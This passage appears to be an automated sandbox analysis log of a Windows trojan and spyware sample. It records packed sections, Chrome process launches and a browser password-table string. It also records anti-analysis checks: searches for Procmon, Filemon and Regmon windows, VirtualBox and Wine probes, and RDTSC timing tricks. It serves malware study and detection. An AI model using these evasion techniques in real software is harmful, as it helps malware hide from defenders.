              Source: file.exe, 00000000.00000003.1999173740.0000000005A28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1982826875.000000000586B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1990730755.00000000058C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1987250228.00000000057B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1991019118.00000000058CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1981975232.00000000057BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1984887674.0000000005949000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1989528590.00000000059CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1990185458.00000000058CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986051402.00000000057B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1987722321.00000000058AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1984053399.00000000057BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1997927557.00000000058EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1983768676.00000000057BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1980133545.00000000057BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1984292492.0000000005941000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985484923.0000000005886000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2013930464.0000000000E53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1981795536.00000000057BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1989088203.00000000058B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2018744002.0000000005A53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1992250880.00000000058D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1990448900.00000000059E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1990587690.00000000057B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1996232049.00000000057B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988639014.00000000057B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2013955953.0000000000E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1993391498.00000000057B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1980220976.000000000584F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1992467125.00000000059FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2013907124.0000000000E65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1984410504.00000000057B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988778086.00000000058BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1995885805.00000000058EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1989256942.00000000057B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1990876370.00000000057B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1991591349.00000000057B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1982728287.00000000057BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985001969.00000000057BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1980305953.000000000541B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1979950460.00000000055B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988154077.00000000059AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1994836087.00000000057C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1983016890.00000000057BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1984646183.00000000057B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1997533367.00000000057B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9993212090163934
              Source: file.exeStatic PE information: Section: qhnzubsn ZLIB complexity 0.9940419644207501
              Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/61@9/6
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.1768451222.00000000051E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1767822351.0000000005204000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 47%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1992,i,4390689463259841264,4189081711849451839,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2016,i,11718227575472931439,6391638913668732061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1992,i,4390689463259841264,4189081711849451839,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2016,i,11718227575472931439,6391638913668732061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 1864192 > 1048576
              Source: file.exeStatic PE information: Raw size of qhnzubsn is bigger than: 0x100000 < 0x19d400
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1cc6b8 should be: 0x1d20d7
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: qhnzubsn
              Source: file.exeStatic PE information: section name: ddtvewwi
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E3CFF7 push FFFFFFF8h; iretd 0_3_00E3D009
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E3CFF7 push FFFFFFF8h; iretd 0_3_00E3D009
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E45567 push esi; retf 0_3_00E4556A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E45567 push esi; retf 0_3_00E4556A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E45567 push esi; retf 0_3_00E4556A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E45567 push esi; retf 0_3_00E4556A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E45567 push esi; retf 0_3_00E4556A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E48D4B push ds; retf 0_3_00E48D4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E48D4B push ds; retf 0_3_00E48D4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E48D4B push ds; retf 0_3_00E48D4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E48D4B push ds; retf 0_3_00E48D4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E48D4B push ds; retf 0_3_00E48D4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E3CFF7 push FFFFFFF8h; iretd 0_3_00E3D009
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E3CFF7 push FFFFFFF8h; iretd 0_3_00E3D009
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E45567 push esi; retf 0_3_00E4556A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E45567 push esi; retf 0_3_00E4556A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E45567 push esi; retf 0_3_00E4556A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E45567 push esi; retf 0_3_00E4556A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E45567 push esi; retf 0_3_00E4556A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E48D4B push ds; retf 0_3_00E48D4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E48D4B push ds; retf 0_3_00E48D4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E48D4B push ds; retf 0_3_00E48D4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E48D4B push ds; retf 0_3_00E48D4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E48D4B push ds; retf 0_3_00E48D4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E4E6AA push edx; retf 0_3_00E4E6D9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E4E6AA push edx; retf 0_3_00E4E6D9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E4E6AA push edx; retf 0_3_00E4E6D9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E4E543 push edx; retf 0_3_00E4E6D9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E4E543 push edx; retf 0_3_00E4E6D9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E4E543 push edx; retf 0_3_00E4E6D9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00E50A0F push esi; retf 0_3_00E50A10
              Source: file.exeStatic PE information: section name: entropy: 7.986813169938198
              Source: file.exeStatic PE information: section name: qhnzubsn entropy: 7.954121203332598

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91129F second address: 9112A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9112A3 second address: 9112A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BB99 second address: 92BBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BBA0 second address: 92BBB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7B8E46E4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BBB3 second address: 92BBB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BD26 second address: 92BD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BD2C second address: 92BD30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DDB5 second address: 92DE33 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sbb dx, 739Bh 0x0000000e push 00000000h 0x00000010 sub dword ptr [ebp+122D3612h], eax 0x00000016 pushad 0x00000017 mov eax, dword ptr [ebp+122D17CEh] 0x0000001d mov dword ptr [ebp+122D3216h], ecx 0x00000023 popad 0x00000024 call 00007FC7B8E46E49h 0x00000029 jmp 00007FC7B8E46E53h 0x0000002e push eax 0x0000002f pushad 0x00000030 pushad 0x00000031 push edi 0x00000032 pop edi 0x00000033 jmp 00007FC7B8E46E57h 0x00000038 popad 0x00000039 jmp 00007FC7B8E46E4Ah 0x0000003e popad 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 push eax 0x00000044 jnc 00007FC7B8E46E48h 0x0000004a pushad 0x0000004b popad 0x0000004c pop eax 0x0000004d mov eax, dword ptr [eax] 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 popad 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DE33 second address: 92DE39 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DEC7 second address: 92DECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
